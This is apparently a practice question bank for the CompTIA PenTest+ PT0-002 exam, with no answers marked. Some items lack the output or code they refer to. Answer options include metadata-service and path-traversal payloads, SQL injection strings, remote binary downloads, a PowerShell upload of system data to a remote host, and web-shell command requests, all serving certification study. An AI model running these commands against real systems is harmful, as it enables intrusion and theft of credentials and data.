Test E CompTIA pentest+ PT0-002

During a routine penetration test of a customer’s physical data center, a penetration tester observes that no changes have been made to the production firewalls in more than five years. Which of the following is the most appropriate remediation technique to reduce the risk of future security breaches?. Video surveillance. Biometric controls. Password encryption. SSH key rotation.

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands: curl http://169.254.169.254/latest Which of the following attacks is the penetration tester more likely trying to perform?. Metadata service attack. Container escape techniques. Credential harvesting. Resource exhaustion.

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients: nmap –sX –T4 –p 21-25, 67, 80, 139, 8080 192.168.11.191 The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?. All of the ports in the target range are closed. Nmap needs more time to scan the ports in the target range. The ports in the target range cannot be scanned because they are common UDP ports. All of the ports in the target range are open.

In Java C/C++, variable initialization is critical because: the unknown value, when used later, will cause unexpected behavior. the compiler will assign null to the variable, which will cause warnings and errors. the initial state of the variable creates a race condition. the variable will not have an object type assigned to it.

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output: Which of the following should the penetration tester include in the report?. Old, insecure ciphers are in use. The 3DES algorithm should be deprecated. 2,048-bit symmetric keys are incompatible with MD5. This server should be upgraded to TLS 1.2.

A penetration tester is reviewing the security of a web application running in an IaaS compute instance. Which of the following payloads should the tester send to get the running process credentials?. file=http://192.168.1.78?+document.cookie. file=../../../proc/self/environ. file=’%20or%2054365=54365;––. file=http://169.254.169.254/latest/meta-data/.

A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user workstations. Which of the following should be included in the recommendations for remediation?. Start a training program on proper access to the web server. Build a patch-management program for the web server. Place the web server in a screened subnet. Implement endpoint protection on the workstations.

In a wireless network assessment, penetration testers would like to discover and gather information about accessible wireless networks in the target area. Which of the following is the most suitable method of finding this information?. Token scoping. RFID cloning. Wardriving. WAF detection. Jamming.

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?. OWASP. MITRE ATT&CK. PTES. NIST.

A penetration tester is performing an assessment against a customer’s web application that is hosted in a major cloud provider’s environment. The penetration tester observes that the majority of the attacks attempted are being blocked by the organization’s WAF. Which of the following attacks would be most likely to succeed?. Reflected XSS. Brute-force. DDoS. Direct-to-origin.

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output: Which of the following is the penetration tester conducting?. Port scan. Brute force. Credential stuffing. DoS attack.

During passive reconnaissance of a target organization’s infrastructure, a penetration tester wants to identify key contacts and job responsibilities within the company. Which of the following techniques would be the most effective for this situation?. Social media scraping. Website archive and caching. DNS lookup. File metadata analysis.

Which of the following documents would be the most helpful in determining who is at fault for a temporary outage that occurred during a penetration test?. Non-disclosure agreement. Business associate agreement. Assessment scope and methodologies. Executive summary.

A penetration tester discovers passwords in a publicly available data breach during the reconnaissance phase of the penetration test. Which of the following is the best action for the tester to take?. Add the passwords to an appendix in the penetration test report. Do nothing. Using passwords from breached data is unethical. Contact the client and inform them of the breach. Use the passwords in a credential stuffing attack when the external penetration test begins.

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?. nmap –sU –p 1–1024 10.0.0.15. nmap –p 22, 25, 80, 3389 –T2 10.0.0.15 –Pn. nmap –T5 –p 1–65535 –A 10.0.0.15. nmap –T3 –F 10.0.0.15.

A penetration tester runs the following command on a system: find / –user root –perm -4000 –print 2>/dev/null Which of the following is the tester trying to accomplish?. Set the SGID on all files in the /directory. Find the /root directory on the system. Find files with the SUID bit set. Find files that were created during exploitation and move them to /dev/null.

Which of the following tools provides Python classes for interacting with network protocols?. Responder. Impacket. Empire. PowerSploit.

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the san is to identify web servers in the 10.0.0.0/16 subnet. Which of the following commands should the engineer use to achieve the objective in the least amount of time?. nmap –T3 –p 80 10.0.0.0/16 ––max-hostgroup 100. nmap –T0 –p 80 10.0.0.0/16. nmap –T4 –p 80 10.0.0.0/16 ––max-rate 60. nmap –T5 –p 80 10.0.0.0/16 ––min-rate 80.

A penetration tester is performing a social engineering penetration test and was able to create a remote session. Which of the following social engineering techniques was most likely successful?. SMS phishing. Dumpster diving. Executive impersonation attack. Browser exploitation framework.

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?. ROE. SLA. NDA. SOW.

A penetration tester is conducting an engagement for a company and has identified a vulnerable web application. During the reconnaissance phase the tester discovers that the internal web application contains end-of-life components. Which of the following is the most appropriate next step?. Report the vulnerability to the company’s IT department and provide the department with detailed information for patching the application. Perform a brute-force attack on the web application’s log-in page to test the strength of user passwords. Launch a denial-of-service attack against the web application to disrupt its availability and expose potential vulnerabilities. Exploit the vulnerability to gam access to the web application’s back-end systems.

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?. Performing a live demonstration of the results to the system administrators. Scheduling of follow-up actions and retesting. Attestation of findings and delivery of the report. Review of the lessons during the engagement.

A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?. nmap –oG list.txt 192.168.0.1-254 | sort. nmap –sn 192.168.0.1-254 | grep “Nmap scan” | awk ‘{print $5}’. nmap ––open 192.168.0.1-254 | uniq | sed ‘s/Nmap//2’ > file.txt. nmap –O 192.168.0.1-254 | cut –f.

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the following actions should the tester take?. Perform forensic analysis to isolate the means of compromise and determine attribution. Incorporate the newly identified method of compromise into the red team’s approach. Create a detailed document of findings before continuing with the assessment. Halt the assessment and follow the reporting procedures as outlined in the contract.

A penetration tester identified numerous flaws that could lead to unauthorized modification of critical data. Which of the following would be best for the penetration tester to recommend?. Flat access. Role-based access control. Permission-based access control. Group-based control model.

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?. Drozer. Burp Suite. Android SDK Tools. MobSF.

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?. Secondary. Emergency. Technical. Primary.

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a minimal chance of detection? (Choose two.). Open-source research. A ping sweep. Traffic sniffing. Port knocking. A vulnerability scan. An Nmap scan.

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code: Which of the following was the script author trying to do?. Spawn a local shell. Disable NIC. List processes. Change the MAC address.

During an assessment, a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web servers. Which of the following actions should the penetration tester perform next?. Continue the assessment and mark the finding as critical. Attempt to remediate the issue temporarily. Notify the primary contact immediately. Shut down the web server until the assessment is finished.

During an assessment, a penetration tester obtains a list of password digests using Responder. Which of the following tools would the penetration tester most likely use next?. Hashcat. Hydra. CeWL. Medusa.

A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients’ usage of the ATMs. Which of the following should the tester do to best meet the company’s vulnerability scan requirements?. Use Nmap’s-T2 switch to run a slower scan and with less resources. Run the scans using multiple machines. Run the scans only during lunch hours. Use Nmap’s-host-timeout switch to skip unresponsive targets.

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester start this process?. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’). schtasks /query /fo LIST /v | find /I “Next Run Time:”. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe.

A penetration tester issues the following command after obtaining a shell: Which of the following describes this technique?. Establishing a backdoor. Privilege escalation. PowerShell remoting. Living-off-the-land.

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization’s sensitive files?. Remote file inclusion. Cross-site scripting. SQL injection. Insecure direct object references.

While conducting a penetration test of a web application, the penetration tester enters the following URI: http://test.comptia.com/../../../../etc/shadow Which of the following attacks is the tester attempting?. XML injection. SQL injection. Directory traversal. Buffer overflow.

A penetration testing firm wants to hire three additional consultants to support a newly signed long-term contract with a major customer. The following is a summary of candidate background checks: Which of the following candidates should MOST likely be excluded from consideration?. Candidate 1. Candidate 2. Candidate 3. Candidate 4.

Which of the following is a ROE component that provides a penetration tester with guidance on who and how to contact the necessary individuals in the event of a disaster during an engagement?. Engagement scope. Communication escalation path. SLA. SOW.

Given the following Bash code snippet: Which of the following would be achieved?. User enumeration. Directory brute-force attack. Port scan. File download.

Given the following user-supplied data: www.comptia.com/info. php?id=1 AND 1=1 Which of the following attack techniques is the penetration tester likely implementing?. Boolean-based SQL injection. Time-based SQL injection. Stored cross-site scripting. Reflected cross-site scripting.

A penetration tester is taking screen captures of hashes obtained from a domain controller. Which of the following BEST explains why the penetration tester should immediately obscure portions of the images before saving?. To maintain confidentiality of data/information. To avoid disclosure of how the hashes were obtained. To make the hashes appear shorter and easier to crack. To prevent analysis based on the type of hash.

Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?. CeWL. John the Ripper. Hashcat. Hydra.

Given the following code: Which of the following tasks could be accomplished with the script?. Reverse shell. Ping sweep. File download. Port scan.

Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?. DirBuster. Open VAS. Scout Suite. CeWL.

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output: Which of the following is the MOST likely explanation for the output?. The tester is not using a valid SSL certificate. The admin directory cannot be fuzzed because it is forbidden. The admin, test, and db directories redirect to the log-in page. The robots.txt file has six entries in it.

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?. Kismet. Burp Suite. BeEF. WHOIS.

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content: Which of the following commands should the penetration tester run to successfully achieve RCE?. python3 -c "import requests;print(requests.post(url-'http://172.16.200.10/uploads/shell.php',data={'cmd=id'}))". python3 -c "import requests;print(requests.post(url-'http://172.16.200.10/uploads/shell.php',data={'cmd': 'id'}).text)". python3 -c "import requests;print(requests.get(url-'http://172.16.200.10/uploads/shell.php',params={'cmd': 'id'}))". python3 -c "import requests;print(requests.get(url-'http://172.16.200.10/uploads/shell.php',params={'cmd': 'id'}).test)".

A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code: salt = 'saltl23' hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000) The penetration tester recommended the code be updated to the following: salt = os.urandom(32) hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?. Changing passwords that were created before this code update. Storing hashes created by both methods for compatibility. Rehashing all old passwords with the new code. Updating the SHA-256 algorithm to something more secure.

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?. OWASP Top 10. MITRE ATT&CK. Cyber Kill Chain. Well-Architected Framework.

An organization wants to identify whether a less secure protocol is being utilized on a wireless network. Which of the following types of attacks will achieve this goal?. False negotiation. Collision. Bad handshake. Downgrade.

While a penetration tester conducts a web application assessment, the following URL is accessed: http://comptia.com/index.php?id=1%20ORR%2022-7%3d10 Which of the following exploit types is being attempted?. XML injection. SQL injection. Session hijacking. Buffer overflow.

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?. dig company.com MX. whois company.com. curl www.company.com. dig company.com A.

A penetration tester runs an Nmap scan and obtains the following output: Which of the following commands should the penetration tester try next to explore this server?. nikto -host http://10.22.2.2. hydra -l administrator -P passwords.txt ftp://10.22.2.2. nmap -p 3389 --script vnc-info.nse 10.22.2.2. medusa -h 10.22.2.2 -n 1433 -u sa -P passwords.txt -M mssql.

During a reconnaissance exercise, a penetration tester runs the following Nmap command: nmap -sT -sV -T2 -p 1-65535 domain.com After watching the scan run for more than two hours, the tester wants to optimize the full scan. Which of the following is the best way to speed up the scan?. Scan fewer ports list. Scan via UDP to improve speed. Change -sT to -sS. Keep the scan timing.

Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?. Executive summary. Vulnerability severity rating. Recommendations of mitigation. Methodology.

A penetration tester is scanning a customer subnet and wants to scan ports that are known to have only well-known UDP services present. Which of the following can the tester use to scan for SNMP. NTP, NetBIOS, and DNS?. nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan. nmap -vv -sXV -p 53-123,137,139,161 192.168.1.0/24 -oA udpscan. nmap -vv -sTV -p 53, 123, 137-139,161,123 192.168.1.0/24 -oA udpscan. nmap -vv -sUV -p 53-161,192.168.1.0 -oA udpscan.

Which of the following OSSTM testing methodologies should be used to test under the worst conditions?. Tandem. Reversal. Semi-authorized. Known environment.

A penetration tester is testing a company's public APIs. In researching the API URLs, the penetration tester discovers that the URLs resolve to a cloud-hosted WAF service that is blocking the penetration tester's attack attempts. Which of the following should the tester do to best ensure the attacks will be more successful?. Increase the volume of attacks to enable more to possibly slip through. Vary the use of upper and lower case characters in payloads to fool the WAF. Use multiple source IP addresses for the attack traffic to prevent being blocked. Locate the company's servers that are hosting the API and send the traffic there.

A company recruited a penetration tester to brute force an SSH password on a server. The tester would like to use THC Hydra to perform the attack and remember the use of the -t option. Which of the following should be considered when using this option?. The number of connects in parallel per target. The number of task connects in parallel overall. The waiting time for a response between connects per threads. If the output shows log-ins and passwords for each attempt.

During a security assessment, a penetration tester decides to use the following Python snippet: Which of the following best describes what the penetration tester is trying to achieve?. Web server denial of service. Web application firewall bypass. Web server response time estimation. Web server latency estimation.

An organization’s Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?. Client acceptance. Data destruction process. Attestation of findings. Lessons learned.

A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?. Include the findings in the final report. Notify the client immediately. Document which commands can be executed. Use this feature to further compromise the server.

A penetration tester keeps a running diary of the day-to-day engagement activity. Which of the following is the most likely explanation for keeping the diary?. To facilitate post-engagement cleanup. To monitor lessons learned. To foster client acceptance. To follow the data destruction process.

Which of the following is the most important aspect to consider when calculating the price of a penetration test service for a client?. Operating cost. Required scope of work. Non-disclosure agreement. Client's budget.

While performing a mobile application penetration test, a security consultant notices that the user password is being locally encrypted before it is sent to the back end for authentication. Which of the following techniques would be best for the consultant to use to find the encryption algorithm and the encryption key?. Sandbox analysis. Information leakage. Reverse engineering. Brute-force attack.

A client has requested that the penetration test scan include the following UDP services: SNMP. NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan.

A penetration tester wants to identify the most common TCP ports on 10.7.8.69. Which of the following is the best Nmap command for this task?. nmap 10.7.8.69 -sS -sA -sV -F. nmap 10.7.8.69 -sT -sA -p1-65535. nmap 10.7.8.69 -sC -sV -Pn. nmap 10.7.8.69 -sX -sU --top-ports.

A penetration tester is gathering information and wants to retrieve hostnames and IP addresses. Which of the following should the tester do?. Obtain password dumps. Implement SSL/TLS certificate analysis. Perform DNS lookups. Conduct web scraping.